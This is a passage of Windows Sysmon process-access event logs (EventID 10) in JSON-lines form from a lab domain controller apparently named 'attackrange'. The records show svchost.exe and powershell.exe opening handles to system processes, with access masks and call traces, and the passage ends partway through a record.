{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1100,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1101,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1102,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1103,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1104,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-0010556D0100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-0010556D0100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1105,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-00106E400100}\r\nTargetProcessId: 2172\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-00106E400100}","TargetProcessId":"2172","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1106,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00108A6E0100}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00108A6E0100}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1107,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-00105AD40000}\r\nTargetProcessId: 1376\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-00105AD40000}","TargetProcessId":"1376","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1108,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: 